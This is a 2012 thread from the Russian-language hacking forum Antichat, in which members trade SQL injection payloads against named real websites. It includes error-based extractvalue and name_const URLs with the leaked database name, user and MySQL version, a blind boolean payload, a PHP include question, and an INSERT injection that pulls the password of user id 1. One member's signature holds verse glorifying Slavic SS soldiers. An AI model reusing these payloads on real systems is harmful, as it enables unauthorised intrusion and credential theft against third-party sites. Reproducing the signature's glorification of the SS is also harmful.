ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.09.2012, 14:00
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от Always
Always said:
http://www.mamashkam.ru/users/tennisvip/blog/1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and(1)='1 --.html
Версию вывел, но больше ничего...
По возможности подскажите.
Код:
Code:
http://www.mamashkam.ru/users/tennisvip/blog/1'and(extractvalue(1,concat(0x3a,concat_ws(0x3a,database(),user(),version()))))and(1)='1--.html
XPATH syntax error: ':mama:mama@localhost:5.5.25'
UPD В chrome ошибка есть, в Firefox нет, учтите!
|
|
|
12.09.2012, 23:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
http://www.cellapplications.com/product_desc.php?id=-1919'+union+select+1,2,3,4,5,6+--+
как быть?
|
|
|
|
12.09.2012, 23:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от OxoTnik
OxoTnik said:
как вариант 5.1.49-1ubuntu8
Пробелы убрать
ну, что можно раскрутить как слепую, я знаю
а если как обычную, ни как?
|
|
|
|
13.09.2012, 00:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от OxoTnik
OxoTnik said:
Нука поподробнее расскажи :ebak:
я имел ввиду через ерор базед
опечатался, с кем не бывает)
меня больше интересует, раскрутить как обычную...
|
|
|
|
13.09.2012, 07:08
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от smirk
smirk said:
я имел ввиду через ерор базед
опечатался, с кем не бывает)
меня больше интересует, раскрутить как обычную...
Не сочти за трололо - но "как обычную" - это как ??
Охотник предложил тебе полностью рабочий вариант, с максимальной выдачей информации ( не Blind и не Time-Based), а что ещё тебе надо ?
Следовать классике - имхо, дурной тон. Это шаблонное мышление, так ты далеко не уйдёшь. Так и останешься работать на старенькой Win95 ?
В уязвимостях, как я считаю, нет понятия "обычная". Все они "необычные" - разные и требуют разных методов реализации. А если ты следуешь шаблонам и по-другому не умеешь мыслить и реализовывать, может дальше и не стоит пробовать, а ?
З.Ы. для люителей шаблонно мыслить
Код:
Code:
_ttp://www.cellapplications.com/product_desc.php?id=1919'+and+substring((@@version),1,1)='5
|
|
|
|
13.09.2012, 21:56
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
Всем привет! Есть вопрос ... Можно раскрутить инклуд в таком коде?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/[\x80-\xFF]/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\r"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\0"[/COLOR][COLOR="#007700"]), array([/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]ENT_QUOTES[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Show'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ucwords[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'Page'[/COLOR][COLOR="#007700"];
if(![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'test/class.'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) {
exit([/COLOR][COLOR="#DD0000"]'error'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// Added Autoload in feature Versions
[/COLOR][COLOR="#007700"]require([/COLOR][COLOR="#DD0000"]'test/class.'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
П.с волнует вопрос если можно обрезать то что идёт ДО переменной |
|
|
|
14.09.2012, 13:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
371
Репутация:
0
|
|
Сообщение от None
INSERT INTO table1 (user_from,
user_to,message
,edittime) VALUES('10',
'10','mess'
,'1347608937')
Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?
|
|
|
|
14.09.2012, 15:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Basters
Basters said:
Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?
а какой ты результат хочешь?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
15.09.2012, 01:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
371
Репутация:
0
|
|
Сообщение от HAXTA4OK
HAXTA4OK said:
а какой ты результат хочешь?
Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...
|
|
|
|
15.09.2012, 08:28
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Basters
Basters said:
Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...
http://www.mysql.ru/docs/man/SELECT.html
INSERT INTO table1 (user_from,user_to,message,edittime) VALUES('10','10',(Select `pass` From `user` WHERE id=1),'1347608937')+--+#user_to,message,edittime) VALUES('10','10','mess','1347608937')
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
